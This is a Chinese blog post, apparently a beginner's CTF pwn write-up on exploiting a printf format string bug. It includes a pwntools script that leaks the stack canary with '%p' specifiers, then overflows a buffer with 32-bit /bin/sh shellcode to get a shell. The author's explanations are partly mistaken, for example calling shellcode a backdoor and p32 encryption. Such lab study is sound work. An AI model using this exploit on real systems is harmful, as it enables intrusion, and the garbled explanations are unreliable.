字符串格式化漏洞

最新推荐文章于 2022-03-04 15:51:35 发布
最新推荐文章于 2022-03-04 15:51:35 发布
阅读量299 收藏 1
点赞数 1
分类专栏: pwn 文章标签: 字符串格式化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CNXBDSa/article/details/97408141
版权

字符串格式化漏洞

  1. 做pwn题首先是放入虚拟机中先运行一下 看看是什么函数
  2. 然后放入ubuntu中 **checksec +**文件,查看是多少位 和有什么保护机制
  3. 然后放入ida中查看 PS:因为知道是字符串格式化漏洞所以要尤其注意printf这个函数 -----放入ida中首先是查看mian函数 按f5或者tab键查看他的伪代码 然后知道是字符串 那么&s这种是我们尤其注意的对象 查看伪代码的时候 可以没事点一下 然后在哪个get_message哪里你点进去 你发现一个printf哪里有个漏洞在这里插入图片描述
  4. 学过c语言的都应该知道一般printf函数输出的时候都要加上%d%p等对着输出进行解释 所以这儿就是典型的字符串格式化漏洞
  5. 然后在虚拟机中使用gdb去跟踪他的返回函数地址
  6. 运行我们的gdb+pwn1 然后start开始
  7. 我们需要去设置断点跟踪他 这个就是为啥我们要去找到printf函数的漏洞 刚刚找的printf哪里按tab键找到他的16进制地址 就是在哪里设置断点去一步步跟踪运行 b *x后面跟刚刚的地址
  8. 再然后c继续运行程序 stack 找到他一个完整的栈 esp栈顶 ebp栈底
  9. 脚本如下
  10. <1> from pwn import *

<2>shellcode="\x31\xc0\x31\xd2\x31\xdb\x31\xc9\x31\xc0\x31\xd2\x52\x68\x2f\x2f"
“\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0”
“\x0b\xcd\x80\n”
<3>context.log_level=‘debug’
<4>p=process("./pwn1")
<5>#p=remote(‘172.16.80.240’,8000)

#########################leak canary,prev_ebp_addr################
<6>p.recvuntil(‘name:’)
<7>p.sendline(’%p.’*40)
<8>leak_data=p.recvuntil(‘messages:’)
<9>address=leak_data.split(’.’)
<10>for i in range(len(address)):
print str(i)+’:’+str(address[i])
<11>canary=address[30]
print “canary=”+canary
<12>prev_ebp_addr=address[33]
<13>print “stack_addr=”+prev_ebp_addr

#########################get shellcode_addr########################
<14>shellcode_addr=int(prev_ebp_addr,16)-144+0x8

#########################send shellcode and get shell##############
<15>payload=‘a’*100+p32(int(canary,16))+‘A’*12+p32(shellcode_addr)+shellcode
p.sendline(payload)
p.interactive()

  1. 对上面的脚步进行解释
  2. 首先说一下结题的原理是利用 Canary机制及绕过策略-格式化字符串漏洞泄露Canary --------Canary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的----Stack canary保护机制在刚进入函数时,在栈上放置一个标志canary,然后 在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。
  3. <1>使用pwn
  4. <2>相当于一个后门
  5. <4>你要连接的服务器的ip和端口
  6. <6>-<12>是利用canary函数的 《6》到时候你要输出一个name注意一下这个到时候会是函数的返回地址 《7》跟他传递一个字符串 《8》-《10》PS:还不太懂语法 大概就是运行canary的吧-----我猜的
  7. <11> 栈顶到canary函数的距离 转化为16进制是124 因为他是首位是0使用哪个地方是30 <12>栈顶到 栈底的距离 转化为16进制是136 理由同上 填33
  8. 《14》首先是后门地址等于整个print栈的地址 减去栈底ebp的虚拟地址和真实地址之间的差 后面加8是栈底到函数返回地址的值 目的是对这个栈进行覆盖暴露出来他的后门 以便获取里面的flag
  9. 《15》这函数get_message函数的栈溢出你可以看到是算一下是112 然后那个canary到栈底是12 他要暴露canary的地址 就要把前面的100全部填充 那个a就是可以替换的在这里插入图片描述
    后面的p32是对canary进行加密 然后那个12是对canary到栈底进行填充 用A填充 最后加上后门
    在这里插入图片描述
    在这里插入图片描述
阿波次的鹅佛鸽
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Format String漏洞介绍
09-23
Format String漏洞介绍 非常详细
格式化字符串漏洞利用
04-14
格式化字符串漏洞利用
格式化字符串漏洞利用 二、格式化函数
龙哥盟
04-12 3万+
二、格式化函数格式化函数是一类特殊的 ANSI C 函数,接受可变数量的参数,其中的一个就是所谓的格式化字符串。当函数求解格式化字符串时,它会访问向函数提供的额外参数。它是一个转换函数,用于将原始的 C 数据类型表示为人类可读的字符串形式。它们在几乎任何 C 程序中都会使用,来输出信息、打印错误信息或处理字符串。这一章中,我们会涵盖格式化函数使用中的典型漏洞,正确用法,它们的一些参数,以及格式化字符
格式化字符串漏洞
qq_52126646的博客
03-04 3400
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
格式化字符串漏洞自动检测与测试用例生成
04-30
格式化字符串漏洞是一种危害高、影响广的软件漏洞。当前漏洞检测方式存在人工依赖度高、误报率高、检测模型单一、未能充分考虑格式化字符串漏洞特点等多种局限性。针对以上问题,对格式化字符串漏洞特征进行分析,...
格式化字符串漏洞1
08-04
格式化字符串漏洞】是一种常见的安全问题,常见于C语言编程环境,特别是在使用`printf`和`scanf`家族函数时。这种漏洞发生的原因是程序在处理格式化字符串时,允许外部输入来控制输出或者错误地处理了参数类型,...
实现字符串格式化功能
04-04
在Android开发中,字符串格式化是一项非常常见的任务,它允许我们根据需求动态地构建和定制字符串内容。在给定的标题“实现字符串格式化功能”和描述中,我们可以推测源码`phrase`提供了一种自定义的方式来处理字符...
格式化字符串漏洞的介绍
01-20
自己学习的时候做的一个ppt,是花了一些心血的,希望对别人能够有所帮助。主要是格式化字符串漏洞的一些介绍,还是挺详细的。
格式化字符串漏洞-无限循环
playmaker的博客
06-16 1557
格式化字符串漏洞-无限循环 程序大致逻辑如下,程序存在system函数,保护只开了NX setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); puts("Welcome to my ctf! What's your name?"); __isoc99_scanf("%64s", &format); printf("Hello...
格式化字符串漏洞原理及简单利用(CGfsb题解)
Sea_Sand息禅
04-02 5364
先介绍一下格式化字符串漏洞,这种漏洞在实际中应该很少有了,但仍然需要了解这些基础的漏洞知识。 会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数,该题就是利用了printf的漏洞,下面以printf为例进行介绍。 printf函数的使用方法为:printf("format",输出表列),由于format部分可以有许多的占位符及字母,所以接受的参...
格式化字符串漏洞利用 五、爆破
weixin_34399060的博客
04-14 150
五、爆破 原文:Exploiting Format String Vulnerabilities 作者:scut@team-teso.net 译者:飞龙 日期:2001.9.1 版本:v1.2 当利用这种漏洞,例如缓冲区溢出或者格...
Format String Vulnerability Lab——格式化字符串漏洞
weixin_42189863的博客
01-16 3482
1 实验概述 格式化字符串漏洞是由像printf(user_input)之类代码引起的,这里user_input变量的内容由用户提供。当这个程序由特权运行(例如Set-UID程序),这个printf会导致以下情况之一: (1)程序崩溃; (2)从内存任意位置读取; (3)修改任意内存位置的值。 应该注意,这个实验的输出依赖于操作系统,我们的描述和讨论是基于Fedora Linux (Core 4)...
深入解析sprintf格式化字符串漏洞
大方子
08-28 4901
  深入解析sprintf格式化字符串漏洞 0x00 前言 从相遇到相识 从相识到相知 ......... 不过你真的懂ta吗 这次故事的主角是PHP中的格式化函数sprintf   0x01 sprintf()讲解   首先我们先了解sprintf()函数 sprintf() 函数把格式化字符串写入变量中。 sprintf(format,arg1,arg2,arg++...
格式化字符串漏洞利用 三、格式化字符串漏洞
热门推荐
龙哥盟
04-14 4万+
三、格式化字符串漏洞 原文:Exploiting Format String Vulnerabilities 作者:scut@team-teso.net 译者:飞龙 日期:2001.9.1 版本:v1.2 格式化字符串漏洞的通常分类是“通道问题”。如果二类不同的信息通道混合为一个,并且特殊的转义字符或序列用于分辨当前哪个通道是激活的,这一类型的漏洞就可能出
(Jarvis Oj)(Pwn) fm
Nothing
06-18 1243
(Jarvis Oj)(Pwn) fm 查看保护。 ida查看程序逻辑。 第12行,很明显的格式化字符串漏洞,当全局变量x的值是4的时候会执行system函数,查看x的值。 x的值是3。所以就要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第...
二进制各种漏洞原理实战分析总结
hhd1988的专栏
10-27 3258
二进制各种漏洞原理实战分析总结 0x01栈溢出漏洞原理 0x02 堆溢出漏洞原理 0x03 堆调试技巧 堆尾检查 页堆 0x04整数溢出漏洞原理 基于栈的整数溢出 ...
字符串格式化漏洞 pwn fmstr
最新发布
05-17
字符串格式化漏洞(Format String Vulnerability)是指在程序中调用格式化输出函数时,由于未正确限制参数中“%”符号的使用而导致的漏洞。攻击者可以利用这种漏洞来读取内存中的任意数据,或者在栈上执行任意代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值